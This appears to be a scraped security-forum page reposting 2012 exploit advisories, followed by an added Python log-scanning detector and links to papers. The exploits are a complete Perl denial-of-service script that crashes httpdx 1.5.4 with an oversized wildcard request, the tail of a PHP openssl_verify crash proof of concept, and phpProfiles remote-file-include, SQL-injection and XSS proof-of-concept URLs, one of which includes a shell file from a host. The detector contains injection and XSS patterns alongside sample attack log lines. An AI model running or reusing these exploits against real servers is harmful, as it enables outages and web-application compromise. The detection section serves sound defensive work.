// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
// EIP 00410041
//
// ==================================================================================

// 1000-byte filler string passed as the signature argument
$buffer = str_repeat("A", 1000);
openssl_verify(1, 1, $buffer);
?>
# 1337day.com [2012-07-20]
Source
  20. httpdx v1.5.4 Remote HTTP Server DoS (using wildcards)
Date: 18 July 2012
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx v1.5.4 Remote HTTP Server DoS (using wildcards)
# Date: 18 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP3
#======================================================================
# Additional notes:
# - One request is enough
# - On crash: Access violation when writing to [41414141]
# - The value x01 is written to [EDI] at the following instruction
#   MOV BYTE PTR DS:[EDI],AL
#
# In msvcrt.dll
# -------------
#
# 77C470D0 8A06      MOV AL,BYTE PTR DS:[ESI]
# 77C470D2 8807      MOV BYTE PTR DS:[EDI],AL   <===== HERE
# 77C470D4 8B45 08   MOV EAX,DWORD PTR SS:[EBP+8]
# 77C470D7 5E        POP ESI
# 77C470D8 5F        POP EDI
# 77C470D9 C9        LEAVE
# 77C470DA C3        RETN
#
# Registers
# -------------
#
# EAX 41414101
# ECX FFFFFFFD
# EDX 00000003
# EBX 00423001 ASCII "&>"
# ESP 01058B9C
# EBP 01058BA4
# ESI 003EA2E0
# EDI 41414141 <============= HERE
# EIP 77C470D2 msvcrt.77C470D2
#
# Crash output :
# --------------
# httpdx 1.5.4 - Started
#
# [http/ftp]://192.168.0.10/
#
# ffs wtf happened?
#
#======================================================================
#======================================================================
# PoC code
#======================================================================
use strict;
use IO::Socket::INET;

my $host = "192.168.0.10";
my $sock = IO::Socket::INET->new("$host:80");

# EDI addr
my $EDI = "\x7A" .   # = 0x41 + 0x39
          "\x32" .   # = 0x41 - 0x0F
          "\x41" .
          "\x41" ;

print $sock "GET /" . "*" x 2450 . "A" x 12 . $EDI . "C" x 528 . " HTTP/1.0\r\n" .
            "Host: $host" . "\r\n\r\n" ;
exit;
# 1337day.com [2012-07-20]
Source
  21. phpProfiles v4.5.4 Beta - Multiple Vulnerabilities
#######################################################
Exploit Title: phpProfiles v4.5.4 Beta - Multiple Vulnerabilities
Date: 24/7/2012
Author: L0n3ly-H34rT
My Site: http://se3c.tk/
Contact: l0n3ly_h34rt@hotmail.com
Software Link: http://sourceforge.net/projects/phpprofiles/files/latest/download
Tested on: Linux/Windows
####################################################

1- Remote File Include :
* In File ( include/body_admin.inc.php ) in line 10 :
<?include("$menu");?>
* P.O.C :
http://127.0.0.1/Full_Release/include/body_admin.inc.php?menu=http://127.0.0.1/shell.txt?
* Note : Must be allow_url_include=On
---------------------------------------------------------------------
2- Remote SQL Injection :
http://127.0.0.1/full_release/community.php?comm_id=[SQL]
-------------------------------------------------------------------------------------
3 - Cross Site Scripting :
http://127.0.0.1/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]
-----------------------------------------------------------------------------------
# Greetz to my friendz
# 1337day.com [2012-07-2
Source
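Posts 20 and 21 describe four request shapes a web server log would record: an oversized request line flooded with '*' wildcards (the httpdx crash), a parameter whose value is itself a URL (the phpProfiles remote file include), and SQL or script fragments in query parameters (its SQL injection and cross-site scripting). The block below is an added example of detection logic for those shapes, written for this page and not taken from either advisory or from the httpdx or phpProfiles projects. The log lines are constructed in combined-log format, the thresholds are hypothetical values to tune per server, and the regexes are deliberately simple so their misses are easy to reason about.

```python
"""Flag web requests that match the abuse shapes described in the httpdx and
phpProfiles posts. Added example; the log lines and thresholds are constructed."""
import re
from urllib.parse import urlsplit, parse_qsl

MAX_REQUEST_TARGET = 2048   # hypothetical: longest request target we expect
MAX_WILDCARD_RUN = 32       # hypothetical: longest run of '*' we tolerate in a path

# Simple, readable patterns; a real deployment would use a fuller ruleset.
SQLI_RE = re.compile(r"(?i)'\s*(or|and|union)\b|\bunion\s+select\b|--\s*$|/\*")
XSS_RE = re.compile(r"(?i)<\s*script\b|javascript:|\bon\w+\s*=")
URL_VALUE_RE = re.compile(r"(?i)^(https?|ftp)://")


def classify_request(target):
    """Return the rule names a request target trips ([] means it looks normal)."""
    reasons = []
    parts = urlsplit(target)
    if len(target) > MAX_REQUEST_TARGET:
        reasons.append("oversized-request-target")
    longest_star = max((len(m) for m in re.findall(r"\*+", parts.path)), default=0)
    if longest_star > MAX_WILDCARD_RUN:
        reasons.append("wildcard-flood")
    # parse_qsl percent-decodes values, so the patterns see what the app sees.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if URL_VALUE_RE.match(value):
            reasons.append(f"url-in-param:{key}")
        if SQLI_RE.search(value):
            reasons.append(f"sqli-pattern:{key}")
        if XSS_RE.search(value):
            reasons.append(f"xss-pattern:{key}")
    return reasons


# Combined log format: client ident user [ts] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) (\S+)')


def scan_log(lines):
    """Yield (client, target, reasons) for every line that trips a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed line; not our concern here
        client, target = m.group(1), m.group(3)
        reasons = classify_request(target)
        if reasons:
            yield client, target, reasons


# Constructed sample traffic: one benign request and one per advisory item.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2012:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1234',
    '198.51.100.7 - - [18/Jul/2012:10:00:02 +0000] "GET /' + "*" * 2450 + 'AAAA HTTP/1.0" 400 0',
    '198.51.100.8 - - [24/Jul/2012:11:00:01 +0000] "GET /Full_Release/include/body_admin.inc.php'
    '?menu=http://127.0.0.1/shell.txt? HTTP/1.1" 200 512',
    '198.51.100.8 - - [24/Jul/2012:11:00:02 +0000] "GET /full_release/community.php'
    "?comm_id=1'%20or%201=1-- HTTP/1.1\" 500 0",
    '198.51.100.8 - - [24/Jul/2012:11:00:03 +0000] "GET /full_release/community.php'
    '?action=showtopic&topic_title=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(client, ", ".join(reasons), target[:60])
```

Detection is the cheap half; the fixes the advisories imply are an input length cap and correct wildcard handling in the server, and on the PHP side an allow-list for the include target plus parameterised queries and output encoding.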
  22. XMLCoreServices Vulnerability Analysis 2012-1889 Technical Analysis Report Author: KAIST Graduate School of Information Security Minsu Kim Date: 06-07-2012 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20084.pdf
  23. nice.. but, with shitty AV on winbl0z -
  24. Having Fun With VirusScan Enterprise Date: 2012-07-12 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/19773.pdf
  25. Forensic Analysis of iOS5 iPhone Backups Date: 2012-07-12 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/19767.pdf